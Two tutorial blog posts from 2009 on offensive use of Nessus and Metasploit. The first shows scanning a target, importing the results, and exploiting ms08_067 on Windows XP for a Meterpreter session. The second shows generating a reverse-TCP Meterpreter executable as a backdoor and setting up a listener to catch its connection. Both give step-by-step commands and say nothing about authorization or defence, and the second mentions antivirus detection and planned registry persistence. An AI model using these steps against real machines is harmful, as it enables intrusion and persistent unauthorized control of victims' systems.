Sunday, March 29, 2009

Owning with Nessus and Metasploit

Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can use to tell us what our target is vulnerable against. Nessus is not included in Backtrack 4, so you either have to go to Nessus's Website or use apt-get. The command for apt-get is...
apt-get install nessus nessusd
Now that you have nessus installed, you need to run "nessusd" in a terminal window. Nessusd is the server side of nessus and it holds all of the plugins. Nessusd will take quite a while to load up, but once it's done, launch the client side of nessus (found in the menu, or run "nessus" in a terminal).

NOTE: You may have to add a user. Use "nessus-adduser" for this.

Now that you have nessus running, in the "Nessusd host" tab, put in the username and password. Now hit "Log in." This should connect nessus to your nessusd server (connecting may take a while). Now go over to the "Target" tab and put in the ip address of your target. Click "Start the scan." After a while, another window will popup with your results. Save them into a file for later (e.g. /root/nessus.nbe).

Now open a terminal window and go to your Metaploit Framework directory (Mine is /pentest/exploits/framework3). Now run ./msfconsole. This will give you the Metasploit prompt and now you can create a database to load our nessus nbe file into.
db_create /root/database.db
This will create the database in our root folder and connect to it. Now do "db_import_nessus_nbe /root/nessus.nbe" which will load in the nessus scan results.

Now do:
db_autopwn -t -x
Metasploit will check the file to see what exploits will work against the machine. Now pick one of the exploits. I'm going to be using "windows/smb/ms08_067" against a windows XP SP2 machine.
use windows/smb/ms08_067
(change it to your exploit). Set the payload that you want. I'm going to be using Meterpreter.
set PAYLOAD windows/meterpreter/bind_tcp
Now set the ip address of your target in the RHOST variable...
Now your ready to exploit!
If everything went well, you should now have a Meterpreter session! I've already filmed this tutorial and I'm doing a little post-production work on it and I should have it uploaded tonight. Again, if you need to contact me, you can reach me at nulbyte [-@-]

Tuesday, March 24, 2009

Meterpreter as a backdoor

After finding THIS video on using meterpreter as a backdoor, I knew I had to make a post about it. I had been trying for a few days to get meterpreter to work as a backdoor, and I hadn't had much luck. This video tutorial was the answer to my prayers.

Now, I had to watch the video a few times because it was a tad bit confusing (unless you pay close attention). I'm hoping this little walk-through will make it clearer and easier to understand.

Step 1: Issue the command:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=5555 X > metexe.exe
(TIP: You must first be in your Metasploit Framework folder)

(Warning: metexe.exe will be detected by some antiviruses - tested with Antivir)

Let me explain what this all does, first of all, "./msfpayload" is the application we are going to run. "windows/meterpreter/reverse_tcp" is the payload we want made into a windows binary. "LHOST=" is a variable holding our (the attacker) IP address. "LPORT=5555" is a variable telling what port to connect back to. "X" (near the end of the command) instructs msfpayload to make it into a windows binary. Finally, "> metexe.exe" tells msfpayload where to save the file.

If you did everything correctly, you should now have a file named metexe.exe in the same directory that msfpayload is in (/pentest/exploits/framework3/, for example).

This is only half the battle, unfortunately. Sure this will connect back to us, but we don't have anything running on our attacker machine to accept the incoming connection. Let's fix this little problem.

Step 2: Start ./msfconsole

Step 3: Type these commands...

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 5555

(TIP: Be sure to change to your IP address)

You will notice that this won't actually exploit anything, it will simply create a listener to accept the meterpreter connection. Try putting metexe.exe onto a windows machine (I don't think it works on Vista, yet) and launch it. If all goes smoothly, your listener should tell you that it just received a connection.

I'm planning on making three more posts related to Meterpreter in the near future. One on how antiviruses react to the compiled payload (metexe.exe), the second one on how to actually use meterpreter, and the third on how to get meterpreter to run on startup using registry keys. Please note that the future posts are in no particular order and an ETA is not currently available.

Again, if you have any questions, comments, or concerns, please email me at nulbytesecurity [-@-]